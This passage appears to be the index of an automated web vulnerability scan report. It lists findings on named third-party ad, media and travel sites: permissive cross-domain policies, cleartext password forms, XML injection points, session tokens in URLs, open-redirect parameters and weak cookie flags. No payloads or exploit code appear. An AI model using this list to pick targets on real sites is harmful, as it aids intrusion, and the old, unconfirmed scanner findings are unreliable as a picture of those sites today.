5.7. http://pix04.revsci.net/crossdomain.xml

5.8. http://secure-us.imrworldwide.com/crossdomain.xml

5.9. http://segment-pixel.invitemedia.com/crossdomain.xml

5.10. http://server.cpmstar.com/crossdomain.xml

5.11. http://tags.bluekai.com/crossdomain.xml

5.12. http://ad.wsod.com/crossdomain.xml

5.13. http://ads.adbrite.com/crossdomain.xml

5.14. http://my.yahoo.com/crossdomain.xml

5.15. http://s.media-imdb.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://matrix.hbo.com/clientaccesspolicy.xml

6.2. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

7.2. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us

7.3. http://www.mavsmoneyball.com/fanposts

7.4. http://www.mavsmoneyball.com/mavericks-tickets

8. XML injection

8.1. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 1]

8.2. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 2]

8.3. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 3]

8.4. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 4]

8.5. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 5]

8.6. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 6]

8.7. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 7]

8.8. http://load.exelator.com/load/ [REST URL parameter 1]

8.9. http://pixel.quantserve.com/seg/r [REST URL parameter 1]

8.10. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

8.11. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

8.12. http://r.nexac.com/e/getdata.xgi [REST URL parameter 1]

8.13. http://r.nexac.com/e/getdata.xgi [REST URL parameter 2]

8.14. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js [REST URL parameter 1]

8.15. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js [REST URL parameter 2]

8.16. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js [REST URL parameter 3]

8.17. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_10_2.en.js [REST URL parameter 1]

8.18. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_10_2.en.js [REST URL parameter 2]

8.19. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_10_2.en.js [REST URL parameter 3]

9. Session token in URL

9.1. http://l.sharethis.com/pview

9.2. http://www.apture.com/js/apture.js

9.3. http://www.facebook.com/extern/login_status.php

9.4. http://www.google.com/recaptcha/api/challenge

10. SSL certificate

11. Open redirection

11.1. http://b.scorecardresearch.com/r [d.c parameter]

11.2. http://r.nexac.com/e/getdata.xgi [ru parameter]

11.3. http://u.openx.net/w/1.0/sc [r parameter]

12. Cookie scoped to parent domain

12.1. http://api.twitter.com/1/FanSided/lists//statuses.json

12.2. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information

12.3. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e4.0-13878-5.gif

12.4. http://a.tribalfusion.com/i.cid

12.5. http://a.tribalfusion.com/j.ad

12.6. http://ad.afy11.net/ad

12.7. http://ad.amgdgt.com/ads/

12.8. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUFng8aJLBZKJyWoaUyNqjOVxerAdnZW8sdXNhLHQsMTMwNzk2NDAxMjgxMCxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVjdWFkUTg1dE1FcUMuTVg2ZXFWMTU3Y1F2SkpuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RFM01TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVDFRNVQxWjNVRnB3YTB4ZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZaM2QwSkJaMVZEUVZGUlFVRkJRVUZQVW04eVlVRkJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmllRVpDV1Y5TU1WUmtla3BQVFhvNGJGRm1TbTFoU0hoRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNlkwTmxkMmhzU25sUGNsZzJOMGxMYVhWUVJGSlJjRFZOV1ZobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

12.9. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUcuadQ85tMEqC.MX6eqV157cQvJJnZW8sdXNhLHQsMTMwNzk2NDAwODE3MSxjLDM0NjQ2NyxwYyw3OTcwMCxhYywxNzc5OTEsbyxOMC1TMCxsLDY0MDU0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRT1Q5T1Z3UFpwa0xfYXlER292QmR5OWs4dlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTlBVUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQVZ3d0JBZ1VDQVFRQUFBQUFPUm8yYUFBQUFBQS4vY25kPSFid1hMTFFqYzNnUVF5T2dYR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJieEZCWV9MMVRkekpPTXo4bFFmSm1hSHhDTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWFHcHFhYnk4VGR4X0VCJm51bT0xJnNpZz1BR2lXcXR6Y0Nld2hsSnlPclg2N0lLaXVQRFJRcDVNWVhnJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

12.10. http://ad.doubleclick.net/ad/N2949.280881.BUZZMEDIA/B5492484.13

12.11. http://ad.doubleclick.net/ad/N5762.1420.TIME.COM1/B5345366.23

12.12. http://ad.doubleclick.net/ad/N5776.time.comOX3940/B5358797.2

12.13. http://ad.doubleclick.net/ad/N6457.131643.MEEBO/B4840137

12.14. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

12.15. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

12.16. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7

12.17. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3

12.18. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

12.19. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2

12.20. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8

12.21. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7

12.22. http://ad.doubleclick.net/adj/N3727.Expedia.com/B5235969.34

12.23. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10

12.24. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11

12.25. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7

12.26. http://ad.doubleclick.net/adj/N6294.149112.GLAMMEDIA.COM/B5303021.4

12.27. http://ad.doubleclick.net/adj/buz.idolator/content

12.28. http://ad.doubleclick.net/adj/cm.mtv/ent_010111

12.29. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

12.30. http://ad.doubleclick.net/adj/oiq.rmx/

12.31. http://ad.doubleclick.net/click

12.32. http://ad.turn.com/server/ads.js

12.33. http://ad.turn.com/server/pixel.htm

12.34. http://admeld.adnxs.com/usersync

12.35. http://admeld.lucidmedia.com/clicksense/admeld/match

12.36. http://adopt.imiclk.com/emb/q

12.37. http://ads.adbrite.com/adserver/vdi/742697

12.38. http://ads.revsci.net/adserver/ako

12.39. http://ak1.abmr.net/is/adopt.imiclk.com

12.40. http://ak1.abmr.net/is/tag.admeld.com

12.41. http://ak1.abmr.net/is/www.burstnet.com

12.42. http://altfarm.mediaplex.com/ad/js/12309-129868-23636-1

12.43. http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11

12.44. http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php

12.45. http://amch.questionmarket.com/adsc/d888315/39/500005401531/decide.php

12.46. http://amch.questionmarket.com/adsc/d893515/8/41197792/decide.php

12.47. http://api.bizographics.com/v1/profile.redirect

12.48. http://apr.lijit.com///www/delivery/ajs.php

12.49. http://ar.voicefive.com/b/recruitBeacon.pli

12.50. http://ar.voicefive.com/b/recruitBeacon.pli

12.51. http://ar.voicefive.com/b/wc_beacon.pli

12.52. http://ar.voicefive.com/bmx3/broker.pli

12.53. http://at.amgdgt.com/ads/

12.54. http://b.scorecardresearch.com/b

12.55. http://b.scorecardresearch.com/p

12.56. http://b.scorecardresearch.com/r

12.57. http://b.voicefive.com/b

12.58. http://b.voicefive.com/p

12.59. http://bh.contextweb.com/bh/rtset

12.60. http://bs.serving-sys.com/BurstingPipe/adServer.bs

12.61. http://bs.serving-sys.com/BurstingPipe/adServer.bs

12.62. http://ce.lijit.com/merge

12.63. http://cm.npc-lee.overture.com/js_1_0/

12.64. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830

12.65. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830

12.66. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

12.67. http://d.chango.com/collector/admeldpixel

12.68. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830

12.69. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830

12.70. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

12.71. http://d.xp1.ru4.com/meta

12.72. http://d.xp1.ru4.com/meta

12.73. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js

12.74. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js

12.75. http://d7.zedo.com/bar/v16-407/d3/jsc/gl.js

12.76. http://d7.zedo.com/img/bh.gif

12.77. http://gdyn.nba.com/1.1/1.gif

12.78. http://glam.grapeshot.co.uk/main/redirect.cgi

12.79. http://ib.adnxs.com/ab

12.80. http://ib.adnxs.com/click/AAAAAAAAAEAAAAAAAAAAQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQOT9OVwPZpkL_ayDGovBdy9k8vVNAAAAAIwuAAC1AAAAlgIAAAIAAABI9AUA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAVwwBAgUCAQQAAAAAORo2aAAAAAA./cnd=!bwXLLQjc3gQQyOgXGNHHASAA/referrer=http://www.twackle.com/headlines/clickenc=http://adclick.g.doubleclick.net/aclk

12.81. http://ib.adnxs.com/getuid

12.82. http://ib.adnxs.com/getuidnb

12.83. http://ib.adnxs.com/mapuid

12.84. http://ib.adnxs.com/ptj

12.85. http://ib.adnxs.com/ptj

12.86. http://ib.adnxs.com/seg

12.87. http://image2.pubmatic.com/AdServer/Pug

12.88. http://img137.imageshack.us/img137/4291/d5zee1.jpg

12.89. http://img690.imageshack.us/img690/7868/umadbroz.jpg

12.90. http://img851.imageshack.us/img851/8021/f7e22bda31624279b2e3f96.png

12.91. http://imp.constantcontact.com/imp/cmp.jsp

12.92. http://js.revsci.net/gateway/gw.js

12.93. http://load.exelator.com/load/

12.94. http://m.adnxs.com/msftcookiehandler

12.95. http://m.xp1.ru4.com/meta

12.96. http://media.fastclick.net/w/tre

12.97. http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif

12.98. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1341668853@Top1

12.99. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1540939750@Top1

12.100. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1760105225@Top1

12.101. http://optimized-by.rubiconproject.com/a/5941/13464/26379-2.js

12.102. http://optimized-by.rubiconproject.com/a/5941/13464/26379-9.js

12.103. http://p.brilig.com/contact/bct

12.104. http://pix04.revsci.net/A09801/b3/0/3/1008211/172737971.js

12.105. http://pix04.revsci.net/D10889/a1/0/3/0.gif

12.106. http://pix04.revsci.net/D10898/b3/0/3/1008211/466985162.js

12.107. http://pix04.revsci.net/D10898/b3/0/3/1008211/916907335.js

12.108. http://pix04.revsci.net/D10898/b3/0/3/1008211/98295750.js

12.109. http://pix04.revsci.net/E06560/b3/0/3/noscript.gif

12.110. http://pix04.revsci.net/G07610/b3/0/3/noscript.gif

12.111. http://pix04.revsci.net/H07710/b3/0/3/1003161/554831275.js

12.112. http://pix04.revsci.net/I09839/b3/0/3/0902121/61203636.js

12.113. http://pixel.invitemedia.com/data_sync

12.114. http://pixel.quantserve.com/pixel

12.115. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

12.116. http://pixel.rubiconproject.com/di.php

12.117. http://pixel.rubiconproject.com/tap.php

12.118. http://r.openx.net/set

12.119. http://r.turn.com/r/bd

12.120. http://r.turn.com/r/beacon

12.121. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

12.122. http://rs.gwallet.com/r1/pixel/x420r9190030

12.123. http://s.ugo.com/b/ss/hugougo,hugoglobal,hugougocw/1/H.20.3/s79206631665583

12.124. http://segments.adap.tv/data/

12.125. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

12.126. http://services.krxd.net/geoip

12.127. http://services.krxd.net/pixel.gif

12.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.129. http://sis.amazon.com/iu

12.130. http://srv.clickfuse.com/pixels/delete.php

12.131. http://stgapi.choicestream.com/instr/csanywhere.js

12.132. http://sync.adap.tv/sync

12.133. http://sync.mathtag.com/sync

12.134. http://syndication.mmismm.com/tntwo.php

12.135. http://t.flux.com/tracking.gif

12.136. http://t.invitemedia.com/track_imp

12.137. http://tags.bluekai.com/site/2312

12.138. http://tags.bluekai.com/site/2731

12.139. http://tags.bluekai.com/site/2736

12.140. http://tags.bluekai.com/site/3113

12.141. http://tags.bluekai.com/site/353

12.142. http://tap.rubiconproject.com/oz/feeds/targus/profile

12.143. http://tap.rubiconproject.com/oz/sensor

12.144. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

12.145. http://tiger.vizu.com/a.gif

12.146. http://timecom.122.2o7.net/b/ss/timecom/1/H.20.2/s79694016552530

12.147. http://tr.adinterax.com/re/mcclatchyinteractive%2CDFW_Y_Star-tel_LB_0222%2CC%3DDFW_Mavericks%2CP%3DDFW-StarTelegram%2CK%3D492697/0.8334790775552392/0/in%2Cti/ti.gif

12.148. http://tvfanatic.us.intellitxt.com/intellitxt/front.asp

12.149. http://u.openx.net/w/1.0/sc

12.150. http://vap3den1.lijit.com/www/delivery/lg.php

12.151. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s75181884909979

12.152. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s77238202237058

12.153. http://vt.imiclk.com/cgi/vtc.cgi

12.154. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp

12.155. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx

12.156. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp

12.157. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

12.158. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp

12.159. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp

12.160. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp

12.161. http://www.expedia.com/hotel.h892034.Hotel-Information

12.162. http://www.imdb.com/title/tt0944947/

12.163. http://www.lijit.com/beacon

12.164. http://www.tiqiq.com/Tiqiq/PublisherHomePage.aspx

12.165. http://www.tiqiq.com/WebServices/EventsData.asmx/LogUserAction

12.166. http://www.wtp101.com/admeld_sync

12.167. http://www.wtp101.com/cox_sync

12.168. http://www22.glam.com/cTagsImgCmd.act

13. Cookie without HttpOnly flag set

13.1. http://ads.adxpose.com/ads/ads.js

13.2. http://dg.specificclick.net/

13.3. http://event.adxpose.com/event.flow

13.4. http://fansided.com/category/nba

13.5. http://idolator.com/favicon.ico

13.6. http://kotaku.com/

13.7. http://kotaku.com/index.php

13.8. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information

13.9. http://www.nba.com/mavericks/index_main.html

13.10. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e4.0-13878-5.gif

13.11. http://www.ugo.com/takeover/takeover.html

13.12. http://www.ugo.com/takeover/takeover.js

13.13. http://a.tribalfusion.com/i.cid

13.14. http://a.tribalfusion.com/j.ad

13.15. http://ad.afy11.net/ad

13.16. http://ad.amgdgt.com/ads/

13.17. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUFng8aJLBZKJyWoaUyNqjOVxerAdnZW8sdXNhLHQsMTMwNzk2NDAxMjgxMCxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVjdWFkUTg1dE1FcUMuTVg2ZXFWMTU3Y1F2SkpuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RFM01TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVDFRNVQxWjNVRnB3YTB4ZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZaM2QwSkJaMVZEUVZGUlFVRkJRVUZQVW04eVlVRkJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmllRVpDV1Y5TU1WUmtla3BQVFhvNGJGRm1TbTFoU0hoRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNlkwTmxkMmhzU25sUGNsZzJOMGxMYVhWUVJGSlJjRFZOV1ZobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

13.18. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUcuadQ85tMEqC.MX6eqV157cQvJJnZW8sdXNhLHQsMTMwNzk2NDAwODE3MSxjLDM0NjQ2NyxwYyw3OTcwMCxhYywxNzc5OTEsbyxOMC1TMCxsLDY0MDU0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRT1Q5T1Z3UFpwa0xfYXlER292QmR5OWs4dlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTlBVUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQVZ3d0JBZ1VDQVFRQUFBQUFPUm8yYUFBQUFBQS4vY25kPSFid1hMTFFqYzNnUVF5T2dYR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJieEZCWV9MMVRkekpPTXo4bFFmSm1hSHhDTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWFHcHFhYnk4VGR4X0VCJm51bT0xJnNpZz1BR2lXcXR6Y0Nld2hsSnlPclg2N0lLaXVQRFJRcDVNWVhnJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

13.19. http://ad.doubleclick.net/ad/N2949.280881.BUZZMEDIA/B5492484.13

13.20. http://ad.doubleclick.net/ad/N5762.1420.TIME.COM1/B5345366.23

13.21. http://ad.doubleclick.net/ad/N5776.time.comOX3940/B5358797.2

13.22. http://ad.doubleclick.net/ad/N6457.131643.MEEBO/B4840137

13.23. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

13.24. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

13.25. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7

13.26. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3

13.27. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

13.28. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2

13.29. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8

13.30. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7

13.31. http://ad.doubleclick.net/adj/N3727.Expedia.com/B5235969.34

13.32. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10

13.33. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11

13.34. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7

13.35. http://ad.doubleclick.net/adj/N6294.149112.GLAMMEDIA.COM/B5303021.4

13.36. http://ad.doubleclick.net/adj/buz.idolator/content

13.37. http://ad.doubleclick.net/adj/cm.mtv/ent_010111

13.38. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

13.39. http://ad.doubleclick.net/adj/oiq.rmx/

13.40. http://ad.doubleclick.net/click

13.41. http://ad.turn.com/server/ads.js

13.42. http://ad.turn.com/server/pixel.htm

13.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**

13.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**

13.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**

13.46. http://ad.yieldmanager.com/iframe3

13.47. http://ad.yieldmanager.com/imp

13.48. http://ad.yieldmanager.com/imp

13.49. http://ad.yieldmanager.com/pixel

13.50. http://ad.yieldmanager.com/unpixel

13.51. http://admeld.lucidmedia.com/clicksense/admeld/match

13.52. http://adopt.imiclk.com/emb/q

13.53. http://ads.ad4game.com/www/delivery/ajs.php

13.54. http://ads.adbrite.com/adserver/vdi/742697

13.55. http://ads.cpxadroit.com/adserver/10-1TZ6SMYM9UGQB.cpxad

13.56. http://ads.gamershell.com/delivery/al.php

13.57. http://ads.gamershell.com/www/delivery/ajs.php

13.58. http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992

13.59. http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702

13.60. http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992

13.61. http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702

13.62. http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992

13.63. http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702

